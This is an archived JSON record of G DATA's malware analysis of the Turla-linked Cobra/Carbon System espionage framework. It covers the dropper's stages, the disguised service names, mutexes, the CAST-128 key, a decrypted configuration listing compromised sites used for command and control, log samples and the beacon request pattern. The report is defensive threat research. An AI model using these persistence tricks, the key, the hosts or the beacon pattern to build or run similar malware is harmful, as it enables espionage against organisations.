{ "id": "582209c1-c49d-4bba-bc0b-31a40c09feb5", "created_at": "2026-04-06T00:09:25.539928Z", "updated_at": "2026-04-10T03:33:01.103842Z", "deleted_at": null, "sha1_hash": "ae44726e9addf80353e75d2b160b5134fc739931", "title": "Analysis of Project Cobra", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 75220, "plain_text": "Analysis of Project Cobra\r\nBy Paul Rascagnères\r\nPublished: 2017-05-11 · Archived: 2026-04-05 16:19:24 UTC\r\nOne specification of the group behind this threat is the fact that when they developed new tools, the old ones are\r\nnot destroyed or abandoned but still maintained and used. Thanks to our collection of samples we are able to draw\r\nthe following timeline:\r\nThe Cobra can be considered as an extensible framework. This framework is generally downloaded and dropped\r\nby a reconnaissance malware for example Tavdig, aka Wipbot (Symantec) or also Epic Backdoor (Kaspersky).\r\nThe following schema illustrates the “modus opandi” used by the Uroburos actors:\r\nUsing IOC (Indicators of Compromise) to detect this malware is quite complicated, because the malware authors\r\nmade efforts to randomize many factors. For example, the attackers drop the malware into different directories,\r\nusing the files present, also chosen randomly, to store the malware configuration.\r\nDue to these characteristics, the experts of the G DATA SecurityLabs decided to publish an analysis of the\r\nframework dropped by the file with the md5: cb1b68d9971c2353c2d6a8119c49b51f. G DATA security solutions\r\ndetect this file as Backdoor.TurlaCarbon.A (Engine A) and Win32.Trojan.Cobra.B (Engine B).\r\nWe can find the compilation path in a file embedded in the dropper:\r\nf:\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb\r\nLooking at this, we can easily identify that “Carbon System” is a part of the “Cobra” project.\r\nDropper\r\nThe dropper is used to install four files on the infected system. The dropped files are stored in the resources of the\r\nbinary. The dropper has the 32-bit and the 64-bit version of the executable files embedded. It installs the following\r\nfiles:\r\nminiport.dat: configuration file;\r\nstage 1: the file name is randomly chosen from ipvpn.dll,srsvc.dll or kmsvc.dll. This library is registered as\r\na service;\r\nstage 2: the file name is msimghlp.dll. It’s the orchestrator of the malware (called “system” by the author);\r\nstage 3: the file name is msximl.dll. This library (called “user” by the authors) is injected in the browsers\r\nand the email clients in order to communicate to the outside via web requests.\r\nThe persistence is performed by the creation of a service (HKLM\\SYSTEM\\CurrentControlSet\\Service\\). The\r\nservice name depends on the chosen stage 1 file name:\r\n\u003cthead\u003e\u003c/thead\u003e\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 1 of 10\n\nFile\r\nName\r\nService\r\nName\r\nDisplay Name\r\nDescription\r\n(Copy\u0026Paste from the binary)\r\nipvpn.dll ipvpn\r\nVirtual Private\r\nNetwork Routing\r\nService\r\nProvides enchanced network management while active\r\nVPN connection established. Support All necessary\r\nfunctions and maintain dynamic table rules. Enforcement\r\ntechnologies that use virtual networks may not function\r\nproperly without this service\r\nsrsvc.dll srservice\r\nSystem Restore\r\nService\r\nPerforms system restore functions. To stop service, turn off\r\nSystem Restore from the System Restore tab in My\r\nComputer.\r\nkmsvc.dll hkmsvc\r\nHealth Key and\r\nCertificate\r\nManagement\r\nService\r\nProvides X.509 certificate and key management services\r\nfor the Network Access Protection Agent (NAPAgent).\r\nEnforcement technologies that use X.509 certificates may\r\nnot function properly without this service\r\nThe descriptions reveal spelling mistakes and the sentence structure may indicate that the texts have been written\r\nby non-native speakers.\r\nStage 1 is always installed in %SystemRoot%\\system32\\\r\nTo install something into %SystemRoot%, the attackers have to have gained administration privileges before they\r\nexecuted the dropper. The three other dropped files are stored in an existing directory in %ProgramFiles%,\r\nrandomly chosen.\r\nDuring the installation, executed in a command line, the dropper displays the following information:\r\nThe screenshot shows the string “LUCKY STRIKE!!!”, displayed in case the installation was carried out\r\nsuccessfully and “Idioten???” in case of any installation error. To be able to find the random installation path, the\r\ndropper modifies a legitimate .inf file (also chosen randomly) in %SystemRoot%\\inf\\ to add the following\r\ninformation to the end of the file:\r\n[B8744A58]\r\nroot=C:\\Program Files\\Windows NT\\Accessoiries\\en-US\r\nThe ID between the brackets is a unique ID and the root variable contains the path in which the three additional\r\nfiles are installed.\r\nThe tricks put in place by the authors – random file names and random installation paths – are used to limit the\r\ndetection possible with Indicators of Compromise. Generally, security researchers use these kinds of artifacts in\r\norder to detect the compromise of systems.\r\nStage 1: loader\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 2 of 10\n\nMD5: 43e896ede6fe025ee90f7f27c6d376a4\r\nG DATA security solutions detect this as Backdoor.TurlaCarbon.A (Engine A) and     Win32.Trojan.Cobra.A\r\n(Engine B).\r\nThe first stage is rather small as the number of instructions and actions is rather small. Simply spoken, its purpose\r\nis to load the second stage. To perform this task, the first stage checks all of the files in %SystemRoot%\\inf\\ in\r\norder to find the entry with the unique ID previously mentioned and therefore to determine the path for stage 2.\r\nAfter that, the library of the second stage is loaded and, subsequently, the exported function ModuleStart() is\r\nexecuted:\r\nStage 2: the orchestrator\r\nMd5: e6d1dcc6c2601e592f2b03f35b06fa8f\r\nVersion: 3.71\r\nG DATA security solutions detect this threat as Backdoor.TurlaCarbon.A (Engine A) and Win32.Trojan.Cobra.B\r\n(Engine B).\r\nThe second stage is called “system” by the authors of the malware. The internal name of the library is\r\ncarbon_system.dll.\r\nThe purpose of this code is to stay in background and orchestrate several requests and tasks made by the other\r\n.dlls or named pipe connections.\r\nMutex creation\r\nThe orchestrator creates several mutexes. These mutexes are used for two reasons:\r\nused by the third stage in order to detect whether the orchestrator has been launched correctly on the\r\ninfected system;\r\nused to execute the orchestrator only once.\r\nHere are the created mutexes:\r\nGlobal\\MSCTF.Shared.MUTEX.zRX\r\nGlobal\\DBWindowsBase\r\nGlobal\\IEFrame.LockDefaultBrowser\r\nGlobal\\WinSta0_DesktopSessionMut\r\nGlobal\\{5FA3BC02-920F-D42A-68BC-04F2A75BE158}\r\nGlobal\\SENS.LockStarterCacheResource\r\nGlobal\\ShimSharedMemoryLock\r\nWorking files and directories\r\nHere are the working files and directories used by the orchestrator. The orchestrator creates one single random\r\npath and then stores all necessary folders mentioned under this one randomly generated path:\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 3 of 10\n\n%randompath%\\Nls\\: directory related to the tasks to be executed\r\n%randompath%\\0208\\: directory related to the temporary files\r\n%randompath%\\System\\: directory related to the additional plugins\r\n%randompath%\\System\\bootmisc.sdi: seems not to be used\r\n%randompath%\\0208\\C_56743.NLS: files related to the tasks to be executed and the plugins\r\n%randompath%\\Nls\\b9s3coff.ax: files related to the tasks to be executed and the named pipe\r\n%randompath%\\Nls\\a67ncodc.ax: file related to the tasks to be executed\r\n%randompath%\\vndkrmn.dic: log file\r\n%randompath%\\qavsrc.dat: log file\r\n%randompath%\\miniport.dat: configuration file\r\n%randompath%\\asmcerts.rs: purpose currently unknown\r\n%randompath%\\getcert.rs: purpose currently unknown\r\nThe files are not automatically created during the startup of the malware. The files are created only if the\r\norchestrator needs them.\r\nConfiguration file\r\nThe configuration file (miniport.dat) is used by the second and the third stage. The file is encrypted with the\r\nCAST-128 algorithm, the same algorithm that has been used by Uroburos to encrypt the file systems. The\r\nencryption key is:\r\n{ 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0xfe, 0xfc,  0xba, 0x98, 0x76, 0x54, 0x32, 0x10 }\r\nNote: following the logic, 0xfc would be expected to be 0xdc.\r\nHere is an example of the configuration file:\r\npaul@gdata:~/Carbon/$ ./decrypt.py miniport.dat\r\n[NAME]\r\nobject_id=acce6511-ba11-fa11-f0047d1\r\niproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe\r\nex = #,netscape.exe,mozilla.exe,adobeupdater.exe,chrome.exe\r\n[TIME]\r\nuser_winmin = 1800000\r\nuser_winmax = 3600000\r\nsys_winmin = 3600000\r\nsys_winmax = 3700000\r\ntask_min = 20000\r\ntask_max = 30000\r\ncheckmin = 60000\r\ncheckmax = 70000\r\nlogmin =  60000\r\nlogmax = 120000\r\nlastconnect=1419925298\r\ntimestop=\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 4 of 10\n\nactive_con = 900000\r\ntime2task=3600000\r\ncheck_lastconnect=1419925298\r\n[CW_LOCAL]\r\nquantity = 0\r\n[CW_INET]\r\nquantity = 4\r\naddress1 = soheylistore.ir:80:/modules/mod_feed/feed.php\r\naddress2 = tazohor.com:80:/wp-includes/feed-rss-comments.php\r\naddress3 = jucheafrica.com:80:/wp-includes/class-wp-edit.php\r\naddress4 = 61paris.fr:80:/wp-includes/ms-set.php\r\n[CW_INET_RESULTS]\r\nquantity = 4\r\naddress1 = soheylistore.ir:80:/modules/mod_feed/feed.php\r\naddress2 = tazohor.com:80:/wp-includes/feed-rss-comments.php\r\naddress3 = jucheafrica.com:80:/wp-includes/class-wp-edit.php\r\naddress4 = 61paris.fr:80:/wp-includes/ms-set.php\r\n[TRANSPORT]\r\nsystem_pipe = comnap\r\nspstatus = yes\r\nadaptable = no\r\n[DHCP]\r\nserver = 135\r\n[LOG]\r\nlogperiod = 7200\r\nlastsend=1419924312\r\n[WORKDATA]\r\nrun_task=\r\nrun_task_system=\r\n[VERSION]\r\nSystem=3/71\r\nUser=3/62\r\nThe websites listed in [CW_INET] and [CW_INET_RESULTS] are all compromised legitimate WordPress\r\nwebsites. By the time of writing this article, all websites have been cleaned and patched.\r\nThe file format is the same as the .ini file format from Windows. The authors use the Windows API to parse the\r\nconfiguration (GetPrivateProfileStringA()).\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 5 of 10\n\nThe file contains:\r\nA unique ID to identify the infected machine (object_id);\r\nThe command and control server used by stage 3 (addressX);\r\nThe version of the “system” and the “user” library (in [VERSION]);\r\nThe frequency and time of execution of several internal tasks ([TIME]);\r\nThe name of the named pipe used as communication channel between the “system” and the “user”\r\n(system_pipe);\r\nThe process name where stage 3 will be injected (iproc);\r\n…\r\nCommunication via named pipes\r\nThe orchestrator creates two named pipes in order to communicate with stage 3 or to receive messages from an\r\nexternal machine:\r\n\\\\.\\\\pipe\\sdlrpc\r\n\\\\.\\\\pipe\\comnap (the name in the configuration file)\r\nFeatures\r\nThe orchestrator creates nine threads in order to handle the different features. We will now have a look at the most\r\ninteresting threads.\r\nOne thread is used to check if the parameters in the configuration file have changed.\r\nA second thread is used to check the available hard disk space. If the HDD space is low, the orchestrator generates\r\nan entry in the log file:\r\nThe preceding screenshot reveals a rather interesting use of English, again. From what we can conclude, we\r\nbelieve “Survive me” is supposed to mean something like “Rescue me” in the sense of “help me to survive”.\r\nA third thread is created in order to handle the tasks. A task is a command sent from the C\u0026C that is to be\r\nexecuted. The code to be executed is stored locally on the infected machine. The orchestrator is able to execute\r\nlibraries (by executing the export start()) or to execute Windows’ command line. The command line can be\r\nexecute with the current user privilege or with the privilege of another user (via CreateProcessA() or\r\nCreateProcessAsUserA()):\r\nA fourth thread is used to handle the log rotation file (vndkrmn.dic).\r\nA fifth thread is used to create and read the data sent to the named pipes.\r\nA sixth thread is used to load plugins. For the orchestrator a module is a library file with a specific export called\r\nModuleStart(). The plugin list is stored in the configuration file ([PLUGINS]). This thread is very similar to the\r\nthird thread, but is bares some minor differences. The function to execute the plugins is not the same.\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 6 of 10\n\nFinally a seventh thread is used to inject stage 3 (msximl.dll) into the browsers and email clients. The list of the\r\ntargeted processes is stored in the configuration file:\r\niproc = iexplore.exe,outlook.exe,msimn.exe,firefox.exe,opera.exe,chrome.exe\r\nAs usual, the injected library is executed via the ModuleStart() exports.\r\nLog file\r\nThe orchestrator and stage 3 generate a shared log file. The file is encrypted with the same algorithm and the same\r\nkey as the configuration file. Here is an example of the content:\r\npaul@gdata:~/Carbon$ ./decrypt.py infected/vndkrmn.dic\r\n[LOG]\r\nstart=1\r\n30/12/14|08:28:44|acce6511-ba11-fa11-f0047d1|s|ST|3/71|0|\r\n30/12/14|08:29:50|acce6511-ba11-fa11-f0047d1|s|INJ|C:\\Program Files\\Windows Mail\\en-US\\msximl.dll|\r\n30/12/14|08:30:28|acce6511-ba11-fa11-f0047d1|s|INJ|0|2204|\r\n30/12/14|08:30:28|acce6511-ba11-fa11-f0047d1|u|ST|3/62|\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n:2204|\r\n30/12/14|08:30:28|acce6511-ba11-fa11-f0047d1|u|ST|2204:END|\r\n30/12/14|08:30:39|acce6511-ba11-fa11-f0047d1|u|W|-1|0|ALL|NOINET|\r\n30/12/14|08:30:41|acce6511-ba11-fa11-f0047d1|u|W|-1|0|ALL|NOINET|\r\n30/12/14|08:37:18|acce6511-ba11-fa11-f0047d1|s|STOP|3/71|0|\r\n30/12/14|08:37:18|acce6511-ba11-fa11-f0047d1|s|STOP|OK|\r\n30/12/14|08:39:45|acce6511-ba11-fa11-f0047d1|s|ST|3/71|0|\r\n30/12/14|08:41:13|acce6511-ba11-fa11-f0047d1|s|INJ|C:\\Program Files\\Windows Mail\\en-US\\msximl.dll|\r\n30/12/14|08:41:34|acce6511-ba11-fa11-f0047d1|s|INJ|0|2196|\r\n30/12/14|08:41:34|acce6511-ba11-fa11-f0047d1|u|ST|3/62|\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"\r\n:2196|\r\n30/12/14|08:41:34|acce6511-ba11-fa11-f0047d1|u|ST|2196:END|\r\n30/12/14|08:41:35|acce6511-ba11-fa11-f0047d1|u|OPER|Wrong config: no lastconnect|\r\n30/12/14|08:41:36|acce6511-ba11-fa11-f0047d1|u|P|0|NULL|0|Sleep:41|\r\n30/12/14|08:41:38|acce6511-ba11-fa11-f0047d1|u|OPER|Wrong config: no lastconnect|\r\n30/12/14|08:41:39|acce6511-ba11-fa11-f0047d1|u|W|-1|0|tazohor.com:/|nrt|\r\n30/12/14|08:41:40|acce6511-ba11-fa11-f0047d1|u|W|-1|0|61paris.fr:/|nrt|\r\n30/12/14|08:41:40|acce6511-ba11-fa11-f0047d1|u|W|0|NULL|0|Sleep:1816467|\r\n30/12/14|08:41:40|acce6511-ba11-fa11-f0047d1|u|P|0|NULL|0|Sleep:604\r\nThe log format is:\r\nDate|Time|Unique ID|source|message\r\nThe source can be:\r\nS: stands for the orchestrator (or “System”);\r\nU: stands for the injected library (or “User”).\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 7 of 10\n\nThe format of the message is not always the same. However, the first part is the executed feature:\r\nST: start (either for the orchestrator or the injected library); the second part of the message is the version\r\n(for example 3.71 for the orchestrator and 3.62 for the injected library) and, regarding the injected library,\r\nthe name of the host process;\r\nSTOP: stop;\r\nOPER: message for the operator (for example when the disk space is low);\r\nW: web requests;\r\nINJ: injection; the second part of the message is the path of the file (lib) used to be injected into e.g. the\r\nbrowser or the PID;\r\nL: load library log message;\r\nS: log rotation message;\r\nT: message linked to the task execution;\r\nStage 3: the injected library\r\nMd5: 554450c1ecb925693fedbb9e56702646 \r\nVersion: 3.62\r\nThis threat is detected by G DATA security solutions as Backdoor.TurlaCarbon.A (Engine A) and\r\nWin32.Trojan.Cobra.B (Engine B).\r\nStage 3 is called “user” by the authors. The internal name of the library is CARBON.dll.\r\nThe purpose of this stage is to communicate to the outside via web requests. The communication is used to ex-filtrate data and to receive orders (or plugins or code to execute).\r\nMutex check\r\nThe first task of stage 3 is to check whether the mutexes created by the orchestrator are available or not, to make\r\nsure the orchestrator has started correctly:\r\nCheck of the Internet connection\r\nBefore communicating with the command and control server, stage 3 checks whether an Internet connection is\r\navailable by contacting:\r\nwww.google.com\r\nwww.yahoo.com\r\nwww.bing.com\r\nupdate.microsoft.com\r\nwindowsupdate.microsoft.com\r\nmicrosoft.com\r\nIn case the connection does not work, the following message is written into the log file:\r\n|u|W|-1|0|ALL|NOINET|\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 8 of 10\n\nCommunication to the command \u0026 controls\nThe communication to the operators is performed via the URL stored in the configuration file.\nFirstly, the malware performs a GET request in order to identify whether the C\u0026C is up and running.\nIf the first query is a success, a second request is sent to the C\u0026C with the difference that some data is included\ninto an HTTP Cookie. The content of the cookie is catid, task, id, forumid, itemid, link, layout, start, limit (none of\nthe parameters is mandatory). The data sent in this cookie is encrypted, using the CAST-128 algorithm, and\nencoded.\nThe malware can also generate POST requests. Here is an example of the pattern:\nPOST hxxp://%s/%s?uid=%d\u0026context=%s\u0026mode=text\u0026data=%s\nThe malware uses the same technique as Tavdig does to receive orders. The data can be seen between the\n\nand the\n\nfield in the following screenshot:\nAdditional features\nStage 3 is able to execute tasks, exactly as the orchestrator is. The code concerning the features is exactly the same\nas the code the orchestrator uses. We assume that this is the case due to copy \u0026 paste. The “user” is able to\nexecute libraries (by executing the export start()) and to execute Windows command line. The command line can\nbe executed with the current user privilege or with the privilege of another user (via CreateProcessA() or\nCreateProcessAsUserA()).\nConclusion\nThis analysis shows us that the actors behind Uroburos, Agent.BTZ and the Carbon System are skilled and still\nactive. This sample we analyzed demonstrates how the authors tried to complicate the detection and the use of\nIndicators of Compromise. Summarized, some of the tricks we have encountered:\nuse of random service names;\nus of random file names;\nuse of random installation directory names;\nconfiguration of the named pipe name;\n…\nCarbon System is a real extensible framework with a plugin management. As these plugins are provided by the\ncontacted C\u0026C servers, it can be anything – nothing has to be pre-bundled. Due to the nature of the malware\nattacks, we can imagine those plugins to be anything connected to cyber espionage, from keyloggers to credentials\nstealers, eavesdropping mechanisms and much more. An attacked enterprise or organization would be an open\nbook for the attackers.\nThe architecture is complex, with an orchestrator and a library injected into the browsers’ and email clients’\nprocesses. Obviously, this approach resembles what we have seen looking at Uroburos. The framework could be\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\nPage 9 of 10\n\nconsidered as a “draft” but still very powerful version (in user-land only) of Uroburos. We believe that Uroburos is\r\nthe product of the Cobra malware evolution. Although Uroburos is a new branch, not a linear follow-up.\r\nLooking at the whole picture that we can draw until now, we can say that everything regarding this whole\r\ncampaign is highly professional. We have analyzed various samples and have drawn many conclusions. Even\r\nthough there are still many open questions that need to be answered, we come closer to charming the snakes – The\r\nCobra, the venomous animal with the deadly bite, and Uroburos, the self-sustaining creepy mixture of a snake and\r\na dragon. This kind of herpetology became quite interesting and we are thrilled to find out more about the\r\ncampaigns.\r\nSource: https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nhttps://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.gdatasoftware.com/blog/2015/01/23926-analysis-of-project-cobra" ], "report_names": [ "23926-analysis-of-project-cobra" ], "threat_actors": [ { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434165, "ts_updated_at": 1775791981, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ae44726e9addf80353e75d2b160b5134fc739931.pdf", "text": "https://archive.orkl.eu/ae44726e9addf80353e75d2b160b5134fc739931.txt", "img": "https://archive.orkl.eu/ae44726e9addf80353e75d2b160b5134fc739931.jpg" } }